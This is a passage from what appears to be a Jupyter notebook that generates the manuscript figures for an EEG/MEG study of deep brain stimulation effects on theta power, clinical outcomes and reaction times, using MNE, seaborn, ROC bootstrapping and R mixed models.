    df = df[(df.Contrast=='DBS') & (df.Freq=='theta') & (df.FDR<0.05)]
    ## Define times (1450 Hz sampling; epoch bounds differ by locking).
    if analysis == 'stim': times = np.arange(0,1.5,1/1450.)
    elif analysis == 'resp': times = np.arange(-1,1,1/1450.)
    ## Make events mask (MSIT onset 0.4 s to mean response 1.127 s, or pre-response).
    if analysis == 'stim': mask_eve = (times > 0.4) & (times < 1.127)
    elif analysis == 'resp': mask_eve = (times < 0)
    ## Iteratively compute percentage within window.
    percentages = []
    for _, row in df.iterrows():
        ## Make significance mask for this cluster's time span.
        mask_sig = np.zeros_like(times)
        mask_sig += (times > row.Tmin) & (times < row.Tmax)
        mask_sig = mask_sig.astype(bool)
        ## Compute overlap (astype(float) guards Python-2 integer division).
        overlap = np.logical_and(mask_sig, mask_eve).sum() / mask_sig.sum().astype(float)
        percentages.append( overlap * 1e2 )
    print('%s: %0.3f' %(analysis, np.mean(percentages)))
    combined.append(df)
## Compute hemisphere dominance: fraction of summed cluster duration (Tdiff)
## carried by left-hemisphere labels.
combined = concat(combined)
combined['hemi'] = ['lh' if label.endswith('lh') else 'rh' for label in combined.Label]
gb = combined.groupby('hemi').Tdiff.sum()
print(gb['lh'] / gb.sum())
```
### Grand Average Topoplots (Power Domain)
```
## Figure 3: grand-average theta-power topoplots. First script computes and
## caches baseline-corrected median TFR power per sensor; second script loads
## the cache and draws the topomaps.
## NOTE(review): this cell uses Python-2 print statements — it was written
## for a py2 kernel, unlike earlier py3 cells in this notebook.
import os
import numpy as np
import pylab as plt
from mne import concatenate_epochs, read_epochs, set_log_level
from mne.channels import read_montage
from mne.time_frequency import tfr_morlet
from mne.viz.topomap import _prepare_topo_plot
set_log_level(verbose=False)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
subjects = ['BRTU','CHDR','CRDA','JADE','JASE','M5','MEWA','S2']
analysis = 'stim'   # overwritten by the loop below
task = 'msit'
h_freq = 50         # filename component of the saved epochs
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
montage = read_montage('standard_1020')
for analysis in ['stim','resp']:
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ### Load data.
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    print 'Beginning processing for %s.' %analysis,
    data = []
    for subject in subjects:
        ## Load epochs.
        epochs = read_epochs('ave/%s_%s_%s_%s-epo.fif' %(subject,task,h_freq,analysis))
        ## Update channel names according to montage (case-insensitive match).
        ch_map = dict()
        for ch in epochs.ch_names:
            ix = [m.lower() for m in montage.ch_names].index(ch.lower())
            ch_map[ch] = montage.ch_names[ix]
        epochs.rename_channels(ch_map)
        ## Set montage.
        epochs.set_montage(montage)
        ## Subtract evoked (leaves induced activity for the TFR).
        epochs = epochs.subtract_evoked()
        ## Clear projectors so epochs can be concatenated across subjects.
        epochs.info['projs'] = []
        data.append( epochs )
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ### Concatenate epochs.
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ## Identify list of channels present for every subject.
    channels = np.concatenate([epochs.ch_names for epochs in data])
    channels = [ch for ch, count in zip(*np.unique(channels, return_counts=True))
                if count==len(subjects)]
    ## Iteratively drop non-common channels.
    for n in range(len(subjects)):
        epochs = data[n]
        epochs = epochs.drop_channels([ch for ch in epochs.ch_names if ch not in channels])
        data[n] = epochs
    data = concatenate_epochs(data)
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ### TFR.
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ## Compute Morlet TFR over theta (4, 6, 8 Hz).
    freqs = np.arange(4,8+1e-6,2)
    n_cycles = 3
    tfr = tfr_morlet(data, freqs, n_cycles, return_itc=False, verbose=False)
    ## Compute baseline (median power in the -0.5..-0.1 s pre-stimulus window).
    if analysis == 'stim':
        mask = (tfr.times >= -0.5) & (tfr.times <= -0.1)
        baseline = np.median(tfr.data[:,:,mask], axis=-1)
    ## Baseline correct (dB relative to baseline).
    ## NOTE(review): for 'resp' this reuses `baseline` computed on the
    ## preceding 'stim' iteration — confirm that is intentional.
    data = tfr.data.copy().T / baseline.T
    data = 10 * np.log10(data.T)
    ## Average over frequencies via the median.
    data = np.apply_along_axis(np.median, 1, data).squeeze()
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ### Plotting.
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ## Cache sensor positions + averaged power for the plotting script below.
    _, pos, _, _, _ = _prepare_topo_plot(tfr, 'eeg', None)
    np.savez_compressed('plots/manuscript/fig3/%s' %analysis, data=data, times=tfr.times, pos=pos)
    print 'Done.'
## Plotting script: load the cached arrays and draw one topomap per locking.
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from mne.viz import plot_topomap
%matplotlib inline
for analysis, v in zip(['stim', 'resp'], [3.5, 4.5]):
    ## Load data.
    npz = np.load('plots/manuscript/fig3/%s.npz' %analysis)
    data = npz['data']
    times = npz['times']
    pos = npz['pos']
    ## Plot mean power in the analysis-specific window, symmetric limits +/-v.
    if analysis == 'stim': mask = (times > 0.4) & (times < 0.8)
    elif analysis == 'resp': mask = (times > -0.2) & (times < 0.2)
    plot_topomap(data[:,mask].mean(axis=-1), pos, cmap='spectral',
                 vmin=-v, vmax=v, contours=0)
```
### DLPFC_5-LH Theta
```
## aIFG (dlpfc_5-lh) theta-power figure: stim- and resp-locked DBS ON/OFF
## average time courses with FDR-significant cluster windows shaded.
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set(style="white", font_scale=1.00)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters.
space = 'source'
model_name = 'revised'
label = 'dlpfc_5-lh'
freq = 'theta'
contrast = 'DBS'
baseline = (-0.5, -0.1)   # pre-stimulus window for baseline subtraction
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Initialize figure.
fig, axes = plt.subplots(1, 2, figsize=(12,4), dpi=300)
colors = ['#0571b0','#ca0020']
labels = ['DBS OFF','DBS ON']
for ax, analysis in zip(axes, ['stim','resp']):
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ### Load data.
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ## Load trial information
    info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
    ## Load source data.
    npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
    data = npz['data']
    times = npz['times']
    ## Load cluster results.
    f = os.path.join(space, 'results', '%s_%s_frequency_results.csv' %(model_name, analysis))
    clusters = read_csv(f)
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ### Main plotting.
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ## Plot lines.
    for m, color, legend in zip([0,1],colors,labels):
        ## Identify DBS on/off trials.
        ix, = np.where(info.DBS==m)
        ## Compute average time course.
        mu = data[ix].mean(axis=0)
        ## If stimulus-locked, baseline subtract.
        if analysis == 'stim': mu -= mu[(times >= baseline[0])&(times <= baseline[1])].mean()
        ## Compute standard error.
        se = data[ix].std(axis=0) / np.sqrt(len(ix))
        ## Plotting.
        ax.plot(times, mu, linewidth=3, color=color, label=legend)
        ax.fill_between(times, mu-se, mu+se, color=color, alpha=0.15)
    ## Shading/marker limits per analysis. BUGFIX: these were previously
    ## assigned inside the cluster loop below, so y1/y2 were undefined
    ## (NameError at the vlines/text calls further down) whenever no
    ## cluster survived the FDR threshold for this panel.
    if analysis == 'stim': y1, y2 = -1.0, 2.5
    else: y1, y2 = -1.5, 1.5
    ## Plot significant clusters.
    for ix in np.where((clusters.Label==label)&(clusters.Freq==freq)&
                       (clusters.Contrast==contrast)&(clusters.FDR<0.05))[0]:
        tmin, tmax = clusters.loc[ix,'Tmin'], clusters.loc[ix,'Tmax']
        ax.fill_between(np.linspace(tmin,tmax,1000), y1, y2, color='k', alpha=0.2)
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ### Add flourishes.
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
    ## Universal fixes.
    ax.set_xlabel('Time (s)', fontsize=24)
    ax.tick_params(axis='both', which='major', labelsize=20)
    ax.spines['right'].set_visible(False)
    ax.spines['top'].set_visible(False)
    if analysis == 'stim':
        ## Fix labels/legends.
        ax.set_ylabel(r' aIFG $\theta$ Power (dB)', fontsize=24)
        ax.legend(loc=2, fontsize=16, frameon=False, borderpad=0)
        ## Fix timing (tick labels re-zeroed to MSIT onset at 0.4 s).
        xticks = np.array([0.0, 0.4, 0.9, 1.4])
        ax.set_xticks(xticks)
        ax.set_xticklabels(xticks - 0.4)
        ax.set_xlim(-0.25,1.5)
        ## Add time markers.
        for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
            ax.text(x+0.02,-0.95,s,fontsize=16)
            ax.vlines(x,y1,y2,linestyle='--',alpha=0.3)
    elif analysis == 'resp':
        ## Add time markers.
        ax.text(0.02, y1+0.05,'Resp', fontsize=16)
        ax.vlines(0.0,y1,y2,linestyle='--',alpha=0.3)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Save figure.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
plt.tight_layout()
# plt.show()
plt.savefig('plots/manuscript/fig3/dlpfc_5-lh.png')
plt.savefig('plots/manuscript/fig3/dlpfc_5-lh.svg')
plt.close('all')
print('Done.')
```
### Significant Theta Clusters
```
## Figure 3: raster of FDR-significant theta clusters per ROI (rows) and
## time (x), colored by contrast — setup and timing markers.
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load data.
f = 'source/results/revised_stim_frequency_results.csv'
df = read_csv(f)
## Limit data to FDR-significant theta clusters.
df = df[df.FDR<0.05]
df = df[df.Freq=='theta'].reset_index(drop=True)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
fig, ax = plt.subplots(1,1,figsize=(6,12))
## Row order: left-hemisphere ROIs first, then right (reversed when plotting).
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
          'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh',
          'racc-rh', 'dacc-rh', 'pcc-rh', 'dmpfc-rh', 'dlpfc_1-rh', 'dlpfc_2-rh',
          'dlpfc_3-rh', 'dlpfc_4-rh', 'dlpfc_5-rh', 'dlpfc_6-rh']
## Add timing details.
for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
    ax.text(x+0.01,-0.6,s,fontsize=20)
    ax.vlines(x, -1, len(labels), linewidth=2.5, linestyle='--',alpha=0.2)
conds = ['DBS','Interference']
colors = ['#ca0020','#008837']
## Draw one horizontal bar per significant cluster; within each ROI row the
## two contrasts are vertically offset by half a row.
for n, label in enumerate(labels[::-1]):
    for m, contrast in enumerate(conds):
        ## Extract clusters for this contrast/ROI.
        clusters = df.loc[(df.Contrast==contrast)&(df.Label==label),['Tmin','Tmax']]
        if not len(clusters): continue
        ## Plot clusters.
        y = n + m * 0.5
        ## BUGFIX: DataFrame.as_matrix() was removed in pandas 1.0;
        ## .values is equivalent and available in every pandas version.
        for cluster in clusters.values:
            ax.hlines(y+0.25, cluster.min(), cluster.max(), color=colors[m], lw=24)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Add legend (empty plots only provide legend handles).
for label, color in zip(conds,colors):
    ax.plot([],[],lw=10,color=color,label=label,alpha=0.7)
ax.legend(bbox_to_anchor=(0.7,1.1), handlelength=1.25, borderaxespad=0)
## Fix x-axis (tick labels re-zeroed to MSIT onset at 0.4 s).
xticks = np.array([0.0, 0.4, 0.9, 1.4])
ax.set(xticks=xticks, xticklabels=xticks-0.4, xlim=(-0.25,1.5),xlabel='Time (s)')
## Fix y-axis with display names for the same ROI order.
labels = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2', 'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG'] * 2
ax.set(yticks=np.arange(len(labels))+0.5, yticklabels=labels[::-1], ylim=(-0.7,len(labels)))
## Add dendrograms.
def dendrogram(ax, x, y1, y2, text):
    """Draw a hemisphere bracket beside the y-axis.

    Renders (in axes-fraction coordinates) one vertical line at ``x``
    spanning ``y1``..``y2``, two short horizontal ticks connecting it back
    toward the axis, and the rotated ``text`` label centered on the span.
    """
    ## Shared line appearance.
    line_width = 2.0
    line_alpha = 0.2
    ## Vertical spine, then the two horizontal ticks at either end.
    segments = [((x, y1), (x, y2)),
                ((x*1.02, y1), (-1e-3, y1)),
                ((x*1.02, y2), (-1e-3, y2))]
    for head, tail in segments:
        ax.annotate('', head, xycoords='axes fraction', xytext=tail,
                    arrowprops=dict(arrowstyle='-', color='k',
                                    linewidth=line_width, alpha=line_alpha))
    ## Rotated caption centered on the bracket.
    ax.annotate(text, (0, 0), xycoords='axes fraction',
                xytext=(x*1.4, (y1 + y2) / 2.0),
                rotation=90, fontsize=30, va='center')
## Bracket the lower/upper halves of the ROI axis by hemisphere, then save.
dendrogram(ax, -0.38, 0.025, 0.51, 'Right Hemisphere')
dendrogram(ax, -0.38, 0.515, 1, 'Left Hemisphere')
sns.despine()
plt.subplots_adjust(left=0.35, right=0.975, top=0.925, bottom=0.075)
plt.savefig('plots/manuscript/fig3/all_theta.png', dpi=180)
plt.savefig('plots/manuscript/fig3/all_theta.svg', dpi=180)
plt.show()
```
### Spectral Barplots
```
## Figure 3: DBS ON-minus-OFF power barplots per ROI and frequency band.
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters
space = 'source'
model_name = 'revised'
contrast = 'DBS'
## Label parameters (internal names and their display names).
labels = ['dlpfc_5-lh', 'dlpfc_4-lh', 'pcc-lh']
xlabels = ['aIFG', 'aMFG 2', 'mCC']
## Define averaging parameters.
baseline = (-0.5, -0.1)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Preallocate space for the long-format columns built below.
analyses = []
freqs = []
rois = []
values = []
## Load trial information once: the info CSV does not depend on the loop
## variables, so reading it inside the innermost loop (as before) was pure
## repeated I/O. Hoisting it is behaviorally identical.
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
for analysis in ['stim','resp']:
    for label, xlabel in zip(labels,xlabels):
        for freq, ffreq in zip(['theta','alpha','beta'],
                               [r'$\theta$',r'$\alpha$',r'$\beta$']):
            #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
            ### Load data.
            #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
            ## Load source data (trials x times + time axis).
            npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
            data = npz['data']
            times = npz['times']
            #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
            ### Compute differences.
            #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
            ## Define the averaging window for this locking.
            if analysis == 'stim': tmin, tmax = 0.4, 0.8
            elif analysis == 'resp': tmin, tmax = -0.2, 0.2
            ## Compute averages within window for DBS OFF (0) and ON (1).
            delta = []
            for i in range(2):
                ## Identify DBS on/off trials.
                ix, = np.where(info.DBS==i)
                ## Compute average time course.
                mu = data[ix].mean(axis=0)
                ## Reduce to time of interest.
                mu = mu[(times >= tmin)&(times <= tmax)]
                delta.append(mu)
            ## Compute difference (ON - OFF) per time point.
            delta = np.diff(delta, axis=0).squeeze()
            ## Append information in long format.
            analyses += [analysis] * len(delta)
            freqs += [ffreq] * len(delta)
            rois += [xlabel]* len(delta)
            values += delta.tolist()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Convert to DataFrame (long format: one row per time point).
df = DataFrame([analyses, freqs, rois, values], index=('Analysis','Freq','ROI','Delta')).T
## Plot: one barplot panel per analysis, grouped by ROI and frequency band.
g = sns.FacetGrid(df, col='Analysis', size=6, aspect=1.5)
g.map(sns.barplot, 'ROI', 'Delta', 'Freq', ci='sd',
      palette=sns.color_palette(n_colors=3))
## Add flourishes: zero line, stripped titles, legend; y-label on first panel.
for n, ax in enumerate(g.axes.squeeze()):
    x1, x2 = ax.get_xlim()
    ax.hlines(0,x1,x2)
    ax.set(xlabel = '', title='')
    ax.legend(loc=1, labelspacing=0, borderpad=0)
    if not n: ax.set_ylabel('Power (ON - OFF)')
plt.savefig('plots/manuscript/fig3/barplots.png', dpi=180)
plt.savefig('plots/manuscript/fig3/barplots.svg', dpi=180)
plt.show()
```
## Figure 4
### DLPFC_5-LH Correlations/ROC plots
```
## Figure 4: assemble per-subject clinical scores, reaction-time changes, and
## theta-power changes into one DataFrame for correlation/ROC plotting.
import os
import numpy as np
import pylab as plt
import seaborn as sns
import matplotlib.gridspec as gridspec
from pandas import DataFrame, Series, read_csv
from scipy.stats import pearsonr
from sklearn.metrics import auc, roc_curve
sns.set_style('white')
sns.set_context('notebook', font_scale=2)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters.
space = 'source'
model = 'revised'
analysis = 'stim'
domain = 'frequency'
contrast = 'DBS'
label = 'dlpfc_5-lh'
freq = 'theta'
fdr = 0.05
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare clinical data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
scores = read_csv('behavior/Subject_Rating_Scales.csv', index_col=0)
subjects = scores.index
## MADRS change from baseline; hypomania conversion status.
madrs = scores['MADRS_Now'] - scores['MADRS_Base']
mania = scores['Hypomania']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare reaction time data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Per-subject mean RT difference, DBS ON (1) minus OFF (0).
rt = read_csv('behavior/EMOTE_behav_data.csv')
rt = rt.groupby(['DBS','subject']).origResponseTimes.mean()
rt = rt[1] - rt[0]
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare power data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
## Load and limit cluster results to significant clusters of this contrast/label.
results = read_csv(os.path.join(space, 'results', '%s_%s_%s_results.csv' %(model,analysis,domain)))
results = results[results.Contrast==contrast]
results = results[results.FDR<fdr]
results = results[results.Label == label].reset_index(drop=True)
## Load time series data.
npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space, analysis, label, freq)))
data = npz['data']
times = npz['times']
## Compute per-subject condition differences (ON minus OFF mean power).
delta = np.zeros(subjects.shape[0])
mask = (times >= results.Tmin.min()) & (times <= results.Tmax.max()) # NOTE: collapsing across clusters
for m, subject in enumerate(subjects):
    i, = np.where((info['Subject']==subject)&(info[contrast]==0))
    j, = np.where((info['Subject']==subject)&(info[contrast]==1))
    delta[m] += (data[j][:,mask].mean(axis=0) - data[i][:,mask].mean(axis=0)).mean()
delta = Series(delta, index=subjects)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Construct DataFrame.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Fixed seed makes the bootstrap in the plotting loop reproducible.
np.random.seed(47404)
## Concatenate data (one row per subject).
df = DataFrame([madrs,mania,rt,delta], index=['MADRS','Hypomania','RT','Delta']).T
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
def swap_arr(x,y):
    """Return independent copies of the two arrays, in exchanged order."""
    swapped_first = y.copy()
    swapped_second = x.copy()
    return swapped_first, swapped_second
def simple_roc(y,x):
    """Compute a ROC curve from binary labels `y` and scores `x`.

    Returns (tpr, fpr): cumulative true/false positive rates obtained by
    sweeping the decision threshold from the highest score downward.
    Reference: http://blog.revolutionanalytics.com/2016/08/roc-curves-in-two-lines-of-code.html
    """
    ## Labels must be strictly binary.
    assert np.all(np.in1d(y, [0,1]))
    ## Order labels by descending score, then accumulate hit/false-alarm rates.
    descending = np.argsort(x)[::-1]
    hits = y[descending].astype(bool)
    tpr = np.cumsum(hits, dtype=float) / hits.sum()
    fpr = np.cumsum(~hits, dtype=float) / (~hits).sum()
    return tpr, fpr
def ROC(y,x):
    """Return (tpr, fpr, auc) for labels `y` and scores `x`.

    When the raw AUC is below 0.5 (scores anti-predictive of the labels),
    the curve is mirrored by swapping tpr/fpr and the AUC reported as its
    complement, so the returned AUC is always >= 0.5.
    """
    ## Compute ROC curve and area under it.
    tpr, fpr = simple_roc(y,x)
    area = auc(fpr, tpr)
    ## Correct for misidentification of the positive direction.
    if area >= 0.5:
        return tpr, fpr, area
    tpr, fpr = swap_arr(tpr, fpr)
    return tpr, fpr, 1 - area
## Initialize figure.
fig = plt.figure(figsize=(16,8))
## Define plotting variables: one color per (clinical measure, outcome) cell,
## categorical tick labels, and y-axis labels for RT vs. theta power.
colors = np.array([['#1f77b4','#2ca02c'], ['#d62728', '#9467bd']])
xticklabels = [['No Response', 'Remission'], ['No History', 'Converted']]
ylabels = [r'$\Delta$ RT (s)', r'$\Delta$ $\theta$-power (dB)']
## Main loop: for each clinical measure (rows) and each outcome variable
## (columns) draw a correlation panel and a bootstrapped ROC panel.
for n, xlabel in enumerate(['MADRS', 'Hypomania']):
    for m, ylabel in enumerate(['RT','Delta']):
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ### Preparations.
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ## Initialize axes: each (n, m) cell gets its own 1x2 GridSpec.
        if not n: top, bottom = 0.95, 0.6
        else: top, bottom = 0.4, 0.05
        if not m: left, right = 0.05, 0.435
        else: left, right = 0.565, 0.95
        gs = gridspec.GridSpec(1,2)
        gs.update(left=left, right=right, top=top, bottom=bottom, wspace=0.4)
        ## Extract variables (subjects with both measures present).
        ## BUGFIX: DataFrame.as_matrix() was removed in pandas 1.0;
        ## .values is equivalent and available in every pandas version.
        x, y = df[[xlabel,ylabel]].dropna().values.T
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ### Correlation Plot.
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ## Plot correlation.
        ax = plt.subplot(gs[0])
        sns.regplot(x, y, df, color=colors[n,m], ax=ax)
        ## Add flourishes (per-panel tick/label choices).
        if not n and not m: ax.set(xticks=[-40,-20,0], xlabel=r'$\Delta$ MADRS')
        elif not n: ax.set(xticks=[-26,-13,0], xlabel=r'$\Delta$ MADRS')
        else: ax.set(xticks=[0,1], xticklabels=xticklabels[n])
        if not m: ax.set(ylim=(-0.15, 0.10), yticks=[-0.10,0.0,0.10],
                         ylabel=ylabels[m])
        else: ax.set(ylim=(-0.5,2), yticks=np.linspace(-0.5,2,3),
                     ylabel=ylabels[m])
        ax.tick_params(axis='x', which='major', pad=15)
        ## Add Pearson correlation text (position varies by panel).
        r, p = pearsonr(x,y)
        if not m and n:
            ax.annotate('r = %0.2f, p = %0.2f' %(r,p), xy=(0,0), xytext=(0.05,0.05),
                        xycoords = 'axes fraction', fontsize=16)
        else:
            ax.annotate('r = %0.2f, p = %0.2f' %(r,p), xy=(0,0), xytext=(0.3,0.05),
                        xycoords = 'axes fraction', fontsize=16)
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ### RoC plots.
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
        ## For MADRS, binarize into responders (>50% score reduction) first.
        if xlabel == 'MADRS':
            x = np.where(scores['MADRS_Now'] / scores['MADRS_Base'] > 0.5, 0, 1)
            x = x[df[ylabel].notnull()]
        ## Initialize plot with the chance diagonal.
        ax = plt.subplot(gs[1])
        ax.plot(np.linspace(0,1,10),np.linspace(0,1,10),lw=1,linestyle='--',color='k')
        ## Plot true RoC.
        tpr, fpr, roc_auc = ROC(x, y)
        ax.plot(fpr, tpr, lw=2, color=colors[n,m])
        ## Bootstrap the AUC (iteration 0 is the unshuffled sample).
        auc_sim = []
        for i in range(1000):
            ## Resample subjects with replacement.
            if i: ix = np.random.choice(np.arange(len(x)), len(x), replace=True)
            else: ix = np.arange(len(x))
            x_p, y_p = x[ix].copy(), y[ix].copy()
            ## Compute AUC.
            _, _, sim = ROC(x_p, y_p)
            auc_sim.append( sim )
        ## Annotate with the bootstrapped 95% CI.
        text = 'AUC = %0.2f [%0.2f, %0.2f]' %(roc_auc, np.nanpercentile(auc_sim, 2.5),
                                              np.nanpercentile(auc_sim, 97.5))
        ax.annotate(text, xy=(0,0), xytext=(0.15,0.05), xycoords = 'axes fraction',
                    fontsize=16)
        ## Add flourishes.
        ax.set(xticks=np.linspace(0,1,3), xlim=(-0.01,1.00), xlabel='FPR',
               yticks=np.linspace(0,1,3), ylim=(0.00,1.01), ylabel='TPR')
## Clean up spines and write both raster and vector versions.
sns.despine()
plt.savefig('plots/manuscript/fig4/combo_plot.png')
plt.savefig('plots/manuscript/fig4/combo_plot.svg')
```
## Supplementary Figures
### Figure S3: AIC Plot
```
## Figure S3: fit nested gamma GLMMs in R (lme4 via rpy2), adding one
## predictor at a time, and plot AIC/BIC as each term enters the model.
import rpy2
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2)
%load_ext rpy2.ipython
%R require(lme4)
%matplotlib inline
## Load data; drop trials without a response; build interaction terms.
df = read_csv('behavior/EMOTE_behav_data.csv')
df = df[np.where(df.responseTimes,True,False)].reset_index(drop=True)
df['DBSxInt'] = df.DBS * df.interference
df['AROxVAL'] = df.arousal * df.valence
%%R -i df -o AICs,BICs
# R cell: grow the formula one predictor at a time, refit, record AIC/BIC.
formula = 'responseTimes ~ (1|subject)'
variables = c('interference','DBS','valence','arousal','TrialNum', 'AROxVAL')
AICs = c()
BICs = c()
for (variable in variables){
    formula = paste(formula, variable, sep=' + ')
    model = glmer(formula, data=df, family=Gamma(link='inverse'))
    AICs = c(AICs, AIC(model))
    BICs = c(BICs, BIC(model))
}
## Build dataframe of fits (long format: one row per model x metric).
variables = np.array(['Interference','DBS','Valence','Arousal','Trial #',r'Arousal $\cdot$ Valence'] * 2)
metrics = np.concatenate([ ['AIC'] * 6, ['BIC'] * 6 ])
